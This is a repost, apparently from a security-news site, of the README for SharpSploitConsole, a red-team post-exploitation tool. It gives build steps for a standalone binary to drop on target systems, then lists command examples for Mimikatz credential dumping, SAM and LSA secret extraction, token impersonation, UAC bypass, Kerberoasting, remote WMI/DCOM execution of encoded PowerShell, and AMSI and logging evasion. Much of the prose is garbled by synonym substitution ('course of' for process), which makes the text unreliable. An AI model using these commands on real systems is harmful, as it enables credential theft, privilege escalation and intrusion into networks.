SharpSploitConsole – Console Application Designed To Interact With SharpSploit

0
27
SharpSploitConsole - Console Application Designed To Interact With SharpSploit

Console Application designed to work together with SharpSploit launched by @cobbr_io
SharpSploit is a device written by @cobbr_io that mixes many strategies/C# code from the infosec group and combines it into one candy DLL. It’s superior so test it out!

Description
SharpSploit Console is only a fast proof of idea binary to assist penetration testers or red teams with much less C# expertise play with a few of the awesomeness that’s SharpSploit. By following the directions under you need to be capable to embed each the SharpSploit.dll and System.Management.Automation.dll into the SharpSploitConsole binary, making a standalone exe you may drop on an applicable goal sytem and run over a non-interactive shell (equivalent to beacon).
This idea might be utilized to many C# binaries. For instance, we might embed the System.Management.Automation.dll into our favourite C# NoPowershell.exe, making a binary that does not depend on the System.Management.Automation.dll on the goal system.

Contact at:

  • Twitter: @anthemtotheego or @g0ldengunsec

Setup – Quick and Dirty
Note: For these of you who do not need to undergo the difficulty of compiling your personal I uploaded an x64 and x86 binary discovered within the CompiledBinaries folder. For these of you who do need to compile your personal… I used Windows 10, Visual Studio 2017 – mileage might differ

  1. Download SharpSploit device from https://github.com/cobbr/SharpSploit.git
  2. Open up SharpSploit.sln in Visual Studio and compile (be sure that to compile for proper structure) – Should see drop down with Any CPU > Click on it and open Configuration Manager > underneath platform change to desired structure and choose okay.
  3. Download SharpSploitConsole device and open up SharpSploitConsole.sln
  4. Copy each SharpSploit.dll and System.Management.Automation.dll present in SharpSploit/bin/x64/Debug listing into SharpSploitConsole/bin/x64/Debug folder
  5. Next we’ll arrange visible studio to embed our DLL’s into our exe so we will simply have a single binary we will run on our goal machine. We will do that by doing the next:

In visible studio:
a. Tools > NuGet Package Manager > Package Manager Console
b. Inside console run:

  Install-Package Costura.Fody

c. Open up notepad and paste the next code under and put it aside with the title FodyWeavers.xml contained in the SharpSploitConsole listing that holds your bin, obj, properties folders.

    <?xml model="1.0" encoding="utf-8"?>
    <Weavers>
      <Costura />
    </Weavers>
  1. Inside visible studio, proper click on References on the righthand aspect, select Add Reference, then browse to the SharpSploitConsole/bin/x64/Debug listing the place we put our two DLL’s, choose them and add them.
  2. Compile, drop binary on course laptop and have enjoyable.

Examples
Note: All instructions are case insensitive
By default all instructions might be taken in as command line args, they are going to be executed and this system will exit (nice for distant shells). This seems one thing like the next: sharpSploitConsole.exe getSystem logonPasswords. Alternatively, if you wish to use the interactive console mode, you should use the work together command to get a pseudo-interactive shell.
Start interactive console mode:

Interact

Mimikatz all of the issues (doesn’t run DCSync) – requires admin or system:

Mimi-All

Runs a particular Mimikatz command of your alternative – requires admin or system:

Mimi-Command privilege::debug sekurlsa::logonPasswords

Runs the Mimikatz command privilege::debug sekurlsa::logonPasswords – requires admin or system:

logonPasswords

Runs the Mimikatz command to retrieve Domain Cached Credentials hashes from registry – requires admin or system:

LsaCache

Runs the Mimikatz command to retrieve LSA Secrets saved in registry – requires admin or system:

LsaSecrets

Retrieve password hashes from the SAM database – requires admin or system:

SamDump

Retrieve Wdigest credentials from registry – requires admin or system:

Wdigest

Retrieve present consumer:

whoami
Username

Impersonate system consumer – requires admin rights:

GetSystem

Impersonate system consumer – Impersonate the token of a specified course of, requires pid – command requires admin rights:

Impersonate 2918

Bypass UAC – requires binary | command | path to binary – requires admin rights:

BypassUAC cmd.exe ipconfig C:WindowsSystem32
BypassUAC cmd.exe "" C:WindowsSystem32

Ends the impersonation of any token, reverts again to preliminary token related to present course of:

RevertToSelf

Retrieve present working listing:

CurrentDirectory

Retrieve present listing itemizing:

DirectoryListing

Changes the present listing by appending a specified string to the present working listing:

ChangeDirectory SomeFolder

Retrieve hostname:

Hostname

Retrieve record of working processes:

ProcessList

Creates a minidump of the reminiscence of a working course of, requires PID | output location | output title – requires admin:

ProcDump 2198 C:UsersUsernameDesktop memorydump.dmp

Retrieve registry path worth, requires full path argument:

ReadRegistry HKEY_LOCAL_MACHINESOFTWAREMicrosoftCOM3BuildNumber

Write to registry, requires full path argument and worth argument:

WriteRegistry HKEY_LOCAL_MACHINESOFTWAREMicrosoftCOM3RemoteAccessEnabled 1

Retrieve customers of native group remotely, requires computername | groupname | username | password:

NetLocalGroupMembers computerName Administrators domainusername [email protected]!
NetLocalGroupMembers 192.168.1.20 Administrators .username [email protected]!

Retrieve native teams remotely, requires computername | username | password:

NetLocalGroups computerName domainusername [email protected]!
NetLocalGroups 192.168.1.20 .username [email protected]!

Retrieve present logged on customers remotely, requires computername | username | password:

NetLoggedOnUsers computerName domainusername [email protected]!
NetLoggedOnUsers 192.168.1.20 .username [email protected]!

Retrieve consumer classes remotely, requires computername | username | password:

NetSessions computerName domainusername [email protected]!
NetSessions 192.168.1.20 .username [email protected]!

Ping techniques, requires computernames:

Ping computer1 computer2 computer3 computer4

Port scan techniques, requires computername | ports:

PortScan computer1 80 443 445 22 23

Get Domain Users, Grabs specified (or all) consumer objects within the goal area, by default will use present consumer context. elective arguments: -username -password -domain -server -searchbase -searchstring -target:

GetDomainUsers

Get Domain Groups, Grabs specified (or all) group objects within the goal area, by default will use present consumer context. elective arguments: -username -password -domain -server -searchbase -searchstring -target:

GetDomainGroups
GetDomainGroups -target "Domain Admins"

Get Domain Computers, Grabs specified (or all) laptop objects within the goal area, by default will use present consumer context. elective arguments: -username -password -domain -server -searchbase -searchstring -target:

GetDomainComputers

Perform Kerberoasting, Performs a kerberoasting assault in opposition to focused (or all) consumer objects within the goal area, by default will use present consumer context. elective arguments: -username -password -domain -server -searchbase -searchstring -target

Kerberoast
Kerberoast -username bob -password Password1 -domain check.corp -server 192.168.1.10 -target sqlService

Run command remotely by way of WMI, requires computername | username | password | command – requires admin:

WMI computer1 domainusername [email protected]! <total powershell empire payload>
WMI computer1 .username [email protected]! powershell -noP -sta -w 1 -enc <Base64>

Run command remotely by way of DCOM, requires computername | command | listing | params – requires admin:

DCOM computer1 cmd.exe c:WindowsSystem32 powershell -noP -sta -w 1 -enc <Base64>

Run shell command:

Shell ipconfig /all

Run powershell command whereas making an attempt to bypass AMSI, scriptBlock logging, and Module logging:

Powershell -noP -sta -w 1 -enc <Base64>

Currently out there choices (extra to come back)

  • Interact : Starts interactive console mode, if you’re interacting remotely you could not need to use this selection
  • Mimi-All : Executes every thing however DCSync, requires admin
  • Mimi-Command : Executes a selected Mimikatz command
  • logonPasswords : Runs privilege::debug sekurlsa::logonPasswords
  • LsaCache : Retrieve Domain Cached Credentials hashes from registry
  • LsaSecrets : Retrieve LSA secrets and techniques saved in registry
  • SamDump : Retrieve password hashes from the SAM database
  • Wdigest : Retrieve Wdigest credentials from registry
  • whoami : Retrieve present consumer
  • GetSystem : Impersonate system consumer, requires admin rights
  • Impersonate : Impersonate the token of a specified course of, requires pid – command requires admin rights.
  • BypassUAC : Bypass UAC, requires binary | command | path to binary – requires admin rights
  • RevertToSelf : Ends the impersonation of any token, reverts again to preliminary token related to present course of
  • CurrentDirectory : Retrieve present working listing
  • DirectoryListing : Retrieve present listing itemizing
  • ChangeDirectory : Changes the present listing by appending a specified string to the present working listing
  • Hostname : Retrieve hostname
  • ProcessList : Retrieve record of working processes
  • ProcDump : Creates a minidump of the reminiscence of a working course of, requires PID | output location | output title – requires admin
  • Username : Retrieve present username
  • ReadRegistry : Retrieve registry path worth, requires full path argument
  • WriteRegistry : Write to registry, requires full path argument | worth
  • NetLocalGroupMembers : Retrieve customers of native group remotely, requires computername | groupname | username | password
  • NetLocalGroups : Retrieve native teams remotely, requires computername | username | password
  • NetLoggedOnUsers : Retrieve present logged on customers remotely, requires computername | username | password
  • NetSessions : Retrieve consumer classes remotely, requires computername | username | password
  • Ping : Ping techniques, requires computernames”
  • PortScan : Port scan techniques, requires computername | ports
  • GetDomainUsers : Grabs specified (or all) consumer objects within the goal area, by default will use present consumer context
  • GetDomainGroups : Grabs specified (or all) group objects within the goal area, by default will use present consumer context
  • GetDomainComputers : Grabs specified (or all) laptop objects within the goal area, by default will use present consumer context
  • Kerberoast : Performs a kerberoasting assault in opposition to focused (or all) consumer objects within the goal area, by default will use present consumer context
  • WMI : Run command remotely by way of WMI, requires computername | username | password | command | requires admin
  • DCOM : Run command remotely by way of DCOM, requires computername | command | listing | params – requires admin
  • Shell : Run a shell command
  • Powershell : Runs a powershell command whereas making an attempt to bypass AMSI, scriptBlock logging, and Module logging

MoreTip.com

LEAVE A REPLY

Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.